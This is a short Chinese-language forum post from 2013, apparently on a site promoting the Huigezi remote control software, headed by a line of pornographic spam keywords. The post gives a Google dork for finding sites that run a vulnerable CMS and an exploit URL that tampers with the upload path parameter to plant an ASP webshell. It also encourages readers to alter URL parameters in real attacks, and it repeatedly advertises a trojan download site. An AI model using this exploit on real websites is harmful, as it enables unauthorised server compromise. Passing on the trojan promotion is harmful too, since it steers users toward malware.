久久精品中文字幕,狠狠色丁香婷婷综合,精品国产制服丝袜高跟,国内精品久久久久久久久齐齐 ,国模冰莲极品自慰人体

灰鴿子遠(yuǎn)程控制軟件

標(biāo)題: 修改url的參數(shù)進(jìn)行突破上傳限制拿webshell 灰鴿子下載www.huigezi.org [打印本頁(yè)]

作者: admin 時(shí)間: 2013-2-3 14:12
標(biāo)題: 修改url的參數(shù)進(jìn)行突破上傳限制拿webshell 灰鴿子下載www.huigezi.org
修改url的參數(shù)進(jìn)行突破上傳限制拿webshell 灰鴿子下載

大家可能都看見(jiàn)過(guò)這樣的漏洞，這里以瘋子的嘉友科技cms上傳漏洞為例。

谷歌關(guān)鍵字：inurl:newslist.asp?NodeCode= 灰鴿子使用教程灰鴿子下載exp：
admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp

他原上傳目錄是:/uploadfile.asp?uppath=PicPath&upname=&uptext=form1.PicPath
可以看出對(duì)參數(shù)PicPath進(jìn)行了修改，
這種漏洞主要是存在文件名或者路徑過(guò)濾不嚴(yán)，在實(shí)戰(zhàn)中多多觀察url中的參數(shù)，可以嘗試進(jìn)行修改數(shù)據(jù)。

歡迎光臨灰鴿子遠(yuǎn)程控制軟件 (http://www.wzgoogletg.cn/)